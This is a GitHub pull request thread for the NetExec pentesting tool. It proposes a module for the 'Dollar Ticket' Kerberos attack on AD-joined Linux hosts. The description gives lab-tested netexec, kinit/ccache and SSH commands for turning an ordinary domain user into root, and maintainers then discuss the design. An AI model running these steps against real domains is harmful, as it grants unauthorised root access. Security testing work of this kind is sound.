Add Dollar Ticket Attack Module

[bl4ckarch]

Description

Adds a new module to automate the Dollar Ticket Attack (CVE-2020-25717, CVE-2020-25719, CVE-2021-42287) - a privilege escalation technique targeting Linux/Unix systems joined to Active Directory.

Attack summary:
The attack exploits MIT Kerberos principal-to-username mapping where machine accounts ending with $ are stripped to local usernames. By creating a machine account root$ and requesting a TGT for root (without $), the KDC fallback issues a ticket for root$ which SSH maps to the local root user.

Implementation:

• Calls existing add-computer module for machine account creation (zero code duplication)
• Uses Impacket's getKerberosTGT() and getKerberosTGS() directly for ticket generation
• Generates both TGT and Service Ticket automatically
• Saves ready-to-use ccache file with both tickets
• Provides clear exploitation and cleanup instructions

Dependencies:

• No new dependencies required
• Uses existing NetExec infrastructure and Impacket functions

The core implementation logic, attack flow, and testing were done manually.

Type of change

• Bug fix (non-breaking change which fixes an issue)
• New feature (non-breaking change which adds functionality)
• Breaking change (fix or feature that would cause existing functionality to not work as expected)
• Deprecation of feature or functionality
• This change requires a documentation update
• This requires a third party update (such as Impacket, Dploot, lsassy, etc)

Setup guide for the review

Test Environment

My Setup:

• Python: 3.12
• OS: Ubuntu 24.04 LTS
• NetExec: Latest main branch

Target Environment:

• Domain Controller: Windows Server 2025 Build 26100 (BALERION.dracarys.lab)
• Linux Target: Ubuntu 24.04 LTS (syrax.dracarys.lab) joined with realm join
• Domain: dracarys.lab
• Test credentials: Standard domain user (no special privileges)

Prerequisites

1. Active Directory Domain Controller:

   • Default MachineAccountQuota of 10 (standard Windows configuration)
   • Any Windows Server version (tested on 2025, 2022, 2019)

2. Linux/Unix Target System:

   • Ubuntu/Debian/RHEL joined to AD using realm join or SSSD
   • SSH with GSSAPI authentication enabled (default for realm-joined systems)
   • A local privileged account (e.g., root, ubuntu, admin)

3. Domain Credentials:

   • Any authenticated domain user (no special privileges required)
   • MachineAccountQuota must not be exhausted

Step-by-Step Testing

# 1. Run the module against the DC
netexec smb 192.168.56.10 -u sunfyre -p 'Pass123!' -M dollar-ticket \
    -o TARGET_USER=root SSH_TARGET=syrax.dracarys.lab

# Expected output:
# - Successfully added 'root$' with password '...'
# - [+] TGT obtained (KDC fallback: root$)
# - [+] Service Ticket obtained for host/syrax.dracarys.lab
# - [+] Tickets saved to: /tmp/dollar_ticket.ccache

# 2. Use the generated ccache file to authenticate
export KRB5CCNAME=/tmp/dollar_ticket.ccache
ssh -o PreferredAuthentications=gssapi-with-mic -l root syrax.dracarys.lab

# 3. Verify privilege escalation
id
# Expected: uid=0(root) gid=0(root) groups=0(root)

# 4. Cleanup - Remove the machine account
netexec smb 192.168.56.10 -u sunfyre -p 'Pass123!' -M add-computer \
    -o NAME=root DELETE=True

Alternative Test Scenarios

# Test with LDAP protocol
netexec ldap 192.168.56.10 -u user -p pass -M dollar-ticket \
    -o TARGET_USER=ubuntu SSH_TARGET=target.domain.lab

# Test with custom password
netexec smb 192.168.56.10 -u user -p pass -M dollar-ticket \
    -o TARGET_USER=admin PASSWORD='ComplexPass123!' SSH_TARGET=target.domain.lab

# Test with custom ccache path
netexec smb 192.168.56.10 -u user -p pass -M dollar-ticket \
    -o TARGET_USER=root SSH_TARGET=target.domain.lab TGT_PATH=/tmp/custom.ccache

Verification Commands

# Check machine account was created
netexec ldap <DC_IP> -u <user> -p <pass> --users | grep "root\$"

# Verify ccache contains both TGT and ST
klist -c /tmp/dollar_ticket.ccache
# Expected output:
# - krbtgt/DOMAIN.LAB@DOMAIN.LAB (TGT)
# - host/target.domain.lab@DOMAIN.LAB (Service Ticket)

# Check MachineAccountQuota
netexec ldap <DC_IP> -u <user> -p <pass> -M maq

Expected Results

Success indicators:

• Machine account root$ created successfully
• TGT obtained with "KDC fallback" message
• Service Ticket generated for target host
• Ccache file saved with both TGT and ST
• SSH authentication succeeds as target user
• Privilege escalation confirmed with id command

Known failure scenarios (properly handled):

• MachineAccountQuota exhausted (error message displayed)
• Insufficient permissions (error message displayed)
• SSH_TARGET not FQDN (Kerberos requires DNS names)
• Target not AD-joined (SSH auth will fail)
• PAC validation enabled on target (rare, mitigates attack)

Screenshots:

Successful exploitation:

Checklist:

• I have ran Ruff against my changes (poetry: poetry run ruff check ., use --fix to automatically fix what it can)
• I have added or updated the tests/e2e_commands.txt file if necessary (new modules or features are required to be added to the e2e tests)
• If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
• I have linked relevant sources that describes the added technique (blog posts, documentation, etc)
  • Samba Wiki - Dollar Ticket Attack
  • The Hacker Recipes Documentation PR
  • CVE-2020-25717, CVE-2020-25719, CVE-2021-42287
• I have performed a self-review of my own code (not an AI review)
• I have commented my code, particularly in hard-to-understand areas
• I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki)

[github-actions]

It looks like the PR template may not have been filled out. The following sections appear to be missing:

• Description

• Type of change

• Setup guide for the review

Please edit your PR description to include them. The template helps reviewers understand and test your changes. Thanks!

[NeffIsBack]

Thanks for the PR!

However, I see a few issues with this:

• The SSH attack heavily uses subprocess.run() which then relies on other tooling to be present. That is unfortunately something we don't want to integrate because it has several problems (besides missing packages it also breaks portability to Windows for example)
• The creation of the computer account seems very similar to add_computer. Blunt question: Wouldn't it be possible to use the add-computer module for the creation of the account and then use kinit/ssh directly?

[bl4ckarch]

Hi, i refactored the code
What I removed:

• All SAMR/LDAPS account creation code
• Duplicate logic that already existed in add-computer

What was added

• Directly importing and calling the existing add-computer module for machine account creation
  Using Impacket's native getKerberosTGT() and getKerberosTGS() functions directly (same as NetExec's generate_tgt() method does)The only difference is I pass custom credentials (root without $) instead of using self.username/self.password

Why I can't just call self.connection.generate_tgt() already present?

• That method uses self.connection.username and self.connection.password. for the Dollar Ticket attack, I need to request a TGT for root (without $) using the password of root$ The KDC fallback mechanism only works when requesting a ticket for the username WITHOUT the $

[azoxlpf]

I just looked at the attack in more detail and I'm wondering if we really want to make a module for it, since essentially it's just creating a machine account and requesting a ST for the target SSH service, so everything is already doable with nxc except for requesting a ST. We could maybe add a --spn or --service option to --generate-tgt so it chains into a ST request using the retrieved TGT, like getTGT does. What do you think? @NeffIsBack @Dfte

[Dfte]

Adding an option to retrieve the ST looks good to me.
And we'll add documentation to explain why it was added, including the dollar ticket attack mentionned by @bl4ckarch

[NeffIsBack]

Sounds good. Having an option to generate STs is nice anyway, a bit more versatility